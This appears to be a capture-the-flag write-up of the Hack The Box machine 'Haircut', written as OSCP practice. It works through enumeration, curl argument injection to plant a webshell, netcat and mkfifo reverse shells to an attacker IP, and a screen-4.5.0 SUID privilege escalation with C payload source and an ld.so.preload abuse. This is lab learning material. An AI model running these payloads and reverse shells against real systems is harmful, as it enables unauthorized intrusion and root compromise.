6 minute read

Introduction


Haircut is a medium rated machine with a user rating of 4.3, which is decent. I think that the box is not so hard to be medium but I would say that we just start with the enumeration of the machine.

Enumeration


I start with an Nmap scan and then enumerate the open ports deeper.

Nmap Scan


Here is a simple scan of all ports:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ sudo nmap -sS  -p- haircut.htb -Pn --min-rate 1000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-07 12:54 CEST
Warning: 10.10.10.24 giving up on port because retransmission cap hit (10).
Nmap scan report for haircut.htb (10.10.10.24)
Host is up (0.068s latency).
Not shown: 64294 closed ports, 1239 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 133.27 seconds

On the two open ports, I perform a deep scan using the -A flag:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ sudo nmap -A  -p 22,80 haircut.htb              
[sudo] password for user: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-07 12:58 CEST
Nmap scan report for haircut.htb (10.10.10.24)
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser 
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), 
Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), 
Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 11 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   ... 10
11  43.45 ms haircut.htb (10.10.10.24)

Nmap done: 1 IP address (1 host up) scanned in 22.95 seconds

Service Enumeration


The SSH version is not vulnerable, so I only need to enumerate the webserver. Here are the results of the gobuster scan:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ gobuster dir -u http://haircut.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://haircut.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,log,txt
[+] Timeout:                 10s
===============================================================
2021/09/07 12:45:00 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 144]
/uploads              (Status: 301) [Size: 194] [--> http://haircut.htb/uploads/]
/test.html            (Status: 200) [Size: 223]                                  
/hair.html            (Status: 200) [Size: 141]
/exposed.php          (Status: 200) [Size: 446]

The HTML files have only an image on them, which does not contain any steganography. So I visited exposed.php, which let me crawl websites. The name is also kinda sus.

Exploitation


This probably works with curl. Curl takes a possible argument -o to download files. I can use this to download the reverse shell:

http://10.10.16.7/webshell.php -o ./uploads/webshell.php

Untitled

This exploits curl and downloads a file from my own webserver to the upload directory of the vulnerable webserver. I can now call the web shell and try to get a reverse shell:

http://haircut.htb/uploads/webshell.php?c=nc%20-e%20/bin/sh%2010.10.16.7%204444

This shell is really buggy, so I just use another reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 5555 >/tmp/f

The page hangs when I send the new reverse shell to the server, so I look at the netcat lister:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ nc -lvnp 
listening on [any] 5555 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.24] 33516
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@haircut:~/html/uploads$ export TERM=xterm
export TERM=xterm
www-data@haircut:~/html/uploads$ ^Z
zsh: suspended  nc -lvnp 5555
                                                         
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ stty raw -echo; 
[1]  + continued  nc -lvnp 5555

www-data@haircut:~/html/uploads$ ls
bounce.jpg  webshell.php

There is the shell as www-data. I already stabilized it using python. Maybe I can read the user flag.

User Flag


The user www-data may have permissions to read files from the home directory of user maria, where the user flag lies:

www-data@haircut:/home$ cd maria
www-data@haircut:/home/maria$ ls
Desktop    Downloads  Pictures  Templates  user.txt
Documents  Music      Public    Videos
www-data@haircut:/home/maria$ cat user.txt
bf**************************0e0c

It worked, I was able to read the flag.

Privesc


I use Linpeas to scan the machine for possible privesc vulnerabilities:

Untitled

The sudo version is vulnerable, but I cannot use the sudo command because I would need the password for www-data:

www-data@haircut:/tmp$ sudo -u#-1 bash 
[sudo] password for www-data: 
www-data@haircut:/tmp$

I do not want to try the kernel exploit yet, only if I’m stuck. There is a SUID binary that I do not know: /usr/bin/screen-4.5.0. I checked the internet on how to exploit the SUID binary, but I found an exploit in the binary (Privesc):

Offensive Security’s Exploit Database Archive

The exploit did not correctly work on the machine, but I found a workaround in the POC to exploit this vulnerability.

First, I create two files: rootshell.c:

#include <stdio.h>
int main(void) {
        setuid(0);
        setgid(0);
        system("nc -e /bin/bash 10.10.16.7 4444");
}

Now, compile this script:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ gcc rootshell.c -o rootshell   
rootshell.c: In function ‘main’:
rootshell.c:3:9: warning: implicit declaration of function ‘setuid’ 
[-Wimplicit-function-declaration]
    3 |         setuid(0);
      |         ^~~~~~
rootshell.c:4:9: warning: implicit declaration of function ‘setgid’ 
[-Wimplicit-function-declaration]
    4 |         setgid(0);
      |         ^~~~~~
rootshell.c:5:9: warning: implicit declaration of function ‘system’ 
[-Wimplicit-function-declaration]
    5 |         system("nc -e /bin/bash 10.10.16.7 4444");
      |         ^~~~~~

You can ignore the warnings. Next, I create libhax.c (this is missing on the machine):

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

I compile that script too:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ gcc -fPIC -shared -ldl -o libhax.so libhax.c 
libhax.c: In function ‘dropshell’:
libhax.c:7:5: warning: implicit declaration of function ‘chmod’ 
[-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~

Now, I can download these two files onto the machine (/tmp):

www-data@haircut:/tmp/screenroot$ wget http://10.10.16.7/libhax.so
--2021-09-07 14:57:35--  http://10.10.16.7/libhax.so
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15560 (15K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[===================>]  15.20K  --.-KB/s    in 0.06s   

2021-09-07 14:57:35 (256 KB/s) - 'libhax.so' saved [15560/15560]

www-data@haircut:/tmp/screenroot$ wget http://10.10.16.7/rootshell
--2021-09-07 14:57:48--  http://10.10.16.7/rootshell
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16088 (16K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[===================>]  15.71K  --.-KB/s    in 0.02s   

2021-09-07 14:57:48 (734 KB/s) - 'rootshell' saved [16088/16088]

www-data@haircut:/tmp/screenroot$ ls
libhax.so  rootshell

Note: You need to start a webserver on your machine first. To exploit the system, just link the libhax.so library to the screen binary and you should be good:

www-data@haircut:/tmp$ cd /etc
www-data@haircut:/etc$ umask 000
www-data@haircut:/etc$ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
www-data@haircut:/etc$ screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
www-data@haircut:/etc$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@haircut:/etc$ /tmp/rootshell

After the command was executed, I check my netcat listener, a reverse shell spawned:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/haircut]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.24] 55844
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

The shell that spawned is a root shell.

Root Flag


I can now read the root flag:

cat /root/root.txt
22**************************d917

Conclusions


It was very easy to get initial access, the privesc was a bit harder because I had to find a workaround for the exploit. All in all a grad box to practise for the OSCP exam.